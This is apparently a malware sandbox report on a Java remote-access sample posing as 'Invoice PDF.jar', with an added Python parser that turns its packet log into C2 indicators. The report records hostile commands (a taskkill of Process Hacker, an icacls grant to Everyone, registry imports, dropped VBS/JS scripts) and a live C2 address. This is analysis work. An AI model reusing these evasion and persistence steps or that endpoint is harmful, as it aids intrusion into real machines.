Apr 19, 2021 23:33:40.862607956 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.862957954 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.863249063 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.863450050 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:40.996846914 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:40.998723984 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:46.919878960 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:46.919935942 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:46.920037985 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:33:46.920137882 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:47.069657087 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:47.274620056 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:47.285845995 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:33:47.422147989 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
Apr 19, 2021 23:34:02.321569920 CEST | 49739       | 7865      | 192.168.2.6     | 107.175.101.209
Apr 19, 2021 23:34:02.581135035 CEST | 7865        | 49739     | 107.175.101.209 | 192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:07.322629929 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:07.579730034 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.387789965 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.398546934 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.431570053 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.536151886 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.536434889 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.543152094 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.748888969 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.748910904 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.748919964 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.749139071 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.753973007 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.754911900 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.755259991 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:16.892981052 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.894902945 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:16.895742893 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:17.093564034 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:17.292509079 CEST497397865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:17.593197107 CEST786549739107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938101053 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938141108 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938162088 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938210011 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938298941 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938339949 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938513994 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938539028 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938555956 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938579082 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938596964 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938612938 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938622952 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938648939 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938658953 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938678026 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938689947 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938709974 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938721895 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938736916 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938749075 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938766956 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938786030 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938802958 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938838005 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938878059 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.938894987 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:21.939007044 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.939049006 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.939065933 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:21.939112902 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074119091 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074167967 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074203968 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074235916 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074343920 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074388981 CEST497747865192.168.2.6107.175.101.209
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074914932 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074953079 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.074981928 CEST786549774107.175.101.209192.168.2.6
                                                                                                                                                                                              Apr 19, 2021 23:34:22.075012922 CEST786549774107.175.101.209192.168.2.6
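The TCP packet rows above leave the sandbox export with the port and address columns fused into one digit string, which makes them hard to feed into anything downstream. The Python below is an added example, not part of the original report and not Joe Sandbox tooling: it parses rows in that fused format back into 5-tuples, resolves the genuinely ambiguous splits (a run such as 497747865 could be ports 49774/7865 or 4977/47865) by keeping only the candidate whose endpoints were seen unambiguously in other rows, then groups packets into flows and lists the non-private endpoints as the C2 candidates to pivot on. The eight SAMPLE_ROWS are copied from the table above; all function names and the flow-summary layout are my own choices.

```python
import ipaddress
import re
from datetime import datetime
from typing import NamedTuple

# Rows copied from the report's TCP packet table above. The sandbox export fuses
# Source Port, Dest Port, Source IP and Dest IP into one digit string.
SAMPLE_ROWS = [
    "Apr 19, 2021 23:33:40.862607956 CEST497397865192.168.2.6107.175.101.209",
    "Apr 19, 2021 23:33:40.996846914 CEST786549739107.175.101.209192.168.2.6",
    "Apr 19, 2021 23:34:02.321569920 CEST497397865192.168.2.6107.175.101.209",
    "Apr 19, 2021 23:34:02.581135035 CEST786549739107.175.101.209192.168.2.6",
    "Apr 19, 2021 23:34:07.322629929 CEST497397865192.168.2.6107.175.101.209",
    "Apr 19, 2021 23:34:07.579730034 CEST786549739107.175.101.209192.168.2.6",
    "Apr 19, 2021 23:34:16.398546934 CEST497747865192.168.2.6107.175.101.209",
    "Apr 19, 2021 23:34:16.536151886 CEST786549774107.175.101.209192.168.2.6",
]

ROW_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(?P<frac>\d+) "
                    r"[A-Z]{3,5}(?P<fused>[\d.]+)$")


class Packet(NamedTuple):
    ts: datetime
    src_port: int
    dst_port: int
    src_ip: str
    dst_ip: str


def _num_ok(s, limit):
    # Plain decimal, no leading zero, within range: rejects most bogus splits.
    return s.isdigit() and (len(s) == 1 or s[0] != "0") and int(s) <= limit


def _split_ips(s):
    # Two fused dotted quads give seven fields; field 4 is the last octet of the
    # first address glued to the first octet of the second.
    parts = s.split(".")
    if len(parts) != 7:
        return []
    mid, out = parts[3], []
    for k in range(1, len(mid)):
        a, b = parts[:3] + [mid[:k]], [mid[k:]] + parts[4:]
        if all(_num_ok(o, 255) for o in a + b):
            out.append((".".join(a), ".".join(b)))
    return out


def candidate_parses(fused):
    """Every syntactically valid (src_port, dst_port, src_ip, dst_ip) split."""
    cands = []
    for a in range(1, 6):            # each port is 1-5 digits
        for b in range(1, 6):
            p1, p2, rest = fused[:a], fused[a:a + b], fused[a + b:]
            if _num_ok(p1, 65535) and _num_ok(p2, 65535):
                cands += [(int(p1), int(p2), i1, i2) for i1, i2 in _split_ips(rest)]
    return cands


def parse_rows(rows):
    staged, known = [], set()
    for row in rows:
        m = ROW_RE.match(row.strip())
        if not m:
            raise ValueError(f"unrecognised row: {row!r}")
        # %f accepts at most six digits; the export carries nanoseconds.
        ts = datetime.strptime(f"{m['ts']}.{m['frac'][:6]}", "%b %d, %Y %H:%M:%S.%f")
        cands = candidate_parses(m["fused"])
        if not cands:
            raise ValueError(f"no valid 5-tuple in {row!r}")
        if len(cands) == 1:          # pass 1: unambiguous rows define real endpoints
            sp, dp, sip, dip = cands[0]
            known |= {(sip, sp), (dip, dp)}
        staged.append((ts, cands))
    packets = []
    for ts, cands in staged:         # pass 2: e.g. 49774|7865 vs 4977|47865
        if len(cands) > 1:
            cands = [c for c in cands if (c[2], c[0]) in known and (c[3], c[1]) in known]
            if len(cands) != 1:
                raise ValueError(f"unresolved split at {ts}: {cands}")
        packets.append(Packet(ts, *cands[0]))
    return packets


def summarize_flows(packets):
    """Bidirectional flows keyed by (client, server); the client sent the first packet."""
    flows = {}
    for p in packets:
        a, b = (p.src_ip, p.src_port), (p.dst_ip, p.dst_port)
        key, d = ((b, a), "in") if (b, a) in flows else ((a, b), "out")
        f = flows.setdefault(key, {"out": 0, "in": 0, "first": p.ts, "last": p.ts})
        f[d] += 1
        f["last"] = max(f["last"], p.ts)
    return flows


def remote_endpoints(packets):
    """Non-private (ip, port) pairs in the capture: the C2 candidates to pivot on."""
    return {(ip, port) for p in packets
            for ip, port in ((p.src_ip, p.src_port), (p.dst_ip, p.dst_port))
            if not ipaddress.ip_address(ip).is_private}
```

Calling `summarize_flows(parse_rows(SAMPLE_ROWS))` on the rows above gives two flows from 192.168.2.6 (source ports 49739 and 49774) to 107.175.101.209:7865, and `remote_endpoints` reduces the capture to that single endpoint; 7865 is not a registered service port, which is what the report's non-standard-port signature is keying on. The endpoint-consistency rule is a heuristic, so the parser raises instead of guessing when it cannot reduce a row to one split, which is the right failure mode when the output feeds an IOC list.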

                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                              Statistics

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:51
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'' >> C:\cmdlinestart.log 2>&1
                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:51
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:52
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'
                                                                                                                                                                                              Imagebase:0xe60000
                                                                                                                                                                                              File size:192376 bytes
                                                                                                                                                                                              MD5 hash:28733BA8C383E865338638DF5196E6FE
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:Java
                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:54
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
                                                                                                                                                                                              Imagebase:0x11f0000
                                                                                                                                                                                              File size:29696 bytes
                                                                                                                                                                                              MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:54
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:54
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:wscript C:\Users\user\bgddtomvyl.js
                                                                                                                                                                                              Imagebase:0xa40000
                                                                                                                                                                                              File size:147456 bytes
                                                                                                                                                                                              MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:32:59
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regedit.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'regedit.exe' 'C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg'
                                                                                                                                                                                              Imagebase:0xde0000
                                                                                                                                                                                              File size:316416 bytes
                                                                                                                                                                                              MD5 hash:617538C965AC4DDC72F9CF647C4343D5
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:13
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\jhxromh.txt'
                                                                                                                                                                                              Imagebase:0xd40000
                                                                                                                                                                                              File size:192376 bytes
                                                                                                                                                                                              MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:14
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class
                                                                                                                                                                                              Imagebase:0xe60000
                                                                                                                                                                                              File size:192376 bytes
                                                                                                                                                                                              MD5 hash:28733BA8C383E865338638DF5196E6FE
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:14
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:16
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:17
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:17
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
                                                                                                                                                                                              Imagebase:0x150000
                                                                                                                                                                                              File size:143360 bytes
                                                                                                                                                                                              MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:17
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                              File size:232960 bytes
                                                                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:18
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff61de10000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              General

Start time: 23:33:18
Start date: 19/04/2021
Path: C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit): true
Commandline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
Imagebase: 0x150000
File size: 143360 bytes
MD5 hash: 00D3041E47F99E48DD5FFFEDF60F6304
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:33:19
Start date: 19/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:33:19
Start date: 19/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:33:20
Start date: 19/04/2021
Path: C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit): true
Commandline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
Imagebase: 0x150000
File size: 143360 bytes
MD5 hash: 00D3041E47F99E48DD5FFFEDF60F6304
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:33:21
Start date: 19/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:33:21
Start date: 19/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:33:22
Start date: 19/04/2021
Path: C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit): true
Commandline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
Imagebase: 0x150000
File size: 143360 bytes
MD5 hash: 00D3041E47F99E48DD5FFFEDF60F6304
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:33:22
Start date: 19/04/2021
Path: C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit): true
Commandline: xcopy 'C:\Program Files (x86)\Java\jre1.8.0_211' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Imagebase: 0x140000
File size: 44544 bytes
MD5 hash: 9F3712DDC0D7FE3D75B8A06C6EE8E68C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:33:23
Start date: 19/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:33:28
Start date: 19/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:33:28
Start date: 19/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:33:37
Start date: 19/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:33:38
Start date: 19/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 23:33:39
Start date: 19/04/2021
Path: C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit): true
Commandline: taskkill /IM ProcessHacker.exe /T /F
Imagebase: 0xbb0000
File size: 74752 bytes
MD5 hash: 15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:33:39
                                                                                                                                                                                              Start date:19/04/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              Wow64 process (32bit):true
